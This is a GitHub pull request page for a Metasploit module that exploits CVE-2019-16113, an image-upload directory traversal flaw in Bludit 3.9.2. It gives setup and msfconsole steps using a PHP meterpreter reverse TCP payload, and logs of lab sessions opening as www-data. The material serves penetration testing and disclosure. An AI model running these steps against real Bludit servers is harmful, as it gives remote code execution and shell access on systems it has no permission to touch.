Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CVE-2019-16113: Bludit Directory Traversal Image Upload Exploit #12542

Merged
merged 2 commits into from Nov 12, 2019

Conversation

@wchen-r7
Copy link
Contributor

wchen-r7 commented Nov 5, 2019

Bludit Directory Traversal Image File Upload Vulnerability

Description

This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-file CMS. A vulnerability was found by christasa in the image uploading feature. A remote user could the uuid parameter in the upload feature in order to save a malicious payload anywhere onto the server, and then use a custom .htaccess file to bypass the file extension check, and finally get remote code execution.

Setup

  1. Set up a Ubuntu box with Apache, PHP, and MySQL.
  2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip
  3. Follow the installation guide here. Make sure your Apache server sets AllowOverride All in /etc/apache2/apache2.conf.

Verification Steps

  • Start msfconsole
  • use exploit/linux/http/bludit_upload_images_exec
  • set rhosts [IP]
  • set bludituser [user]
  • set bluditpass [pass]
  • set payload php/meterperter/reverse_tcp
  • set lhost [ip]
  • run, you should get a session like the following demo:
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading qGkVsmahdK.png...
[*] Uploading .htaccess...
[*] Executing qGkVsmahdK.png...
[*] Sending stage (38288 bytes) to 172.16.135.162
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600
[+] Deleted .htaccess
@wchen-r7

This comment has been minimized.

Copy link
Contributor Author

wchen-r7 commented Nov 11, 2019

@space-r7 Yup I made some typos. I will correct them. Thanks.

@wchen-r7

This comment has been minimized.

Copy link
Contributor Author

wchen-r7 commented Nov 12, 2019

This is good to go again.

@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Nov 12, 2019

This is good to go again.

I'll set up an environment, then test and land. Thanks!

@space-r7 space-r7 self-assigned this Nov 12, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Nov 12, 2019

Tested on Bludit v3.9.2:

msf5 > use exploit/linux/http/bludit_upload_images_exec 
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser admin
bludituser => admin
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass password
bluditpass => password
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 192.168.37.165
rhosts => 192.168.37.165
msf5 exploit(linux/http/bludit_upload_images_exec) > check
[*] 192.168.37.165:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading cqAWnwRSUh.png...
[*] Uploading .htaccess...
[*] Executing cqAWnwRSUh.png...
[*] Sending stage (38288 bytes) to 192.168.37.165
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.165:46068) at 2019-11-12 15:31:32 -0600
[+] Deleted .htaccess

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux
space-r7 added a commit that referenced this pull request Nov 12, 2019
@space-r7 space-r7 merged commit 717a31c into rapid7:master Nov 12, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
msjenkins-r7 added a commit that referenced this pull request Nov 12, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Nov 12, 2019

Release Notes

This adds an exploit module for Bludit, an open source CMS. For versions below v3.10.0, there is a vulnerability in the file upload functionality that allows an attacker to upload a file anywhere on the system by changing the uuid value in the upload request. An attacker can gain code execution by uploading a payload and uploading a new .htaccess file to bypass extension checks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.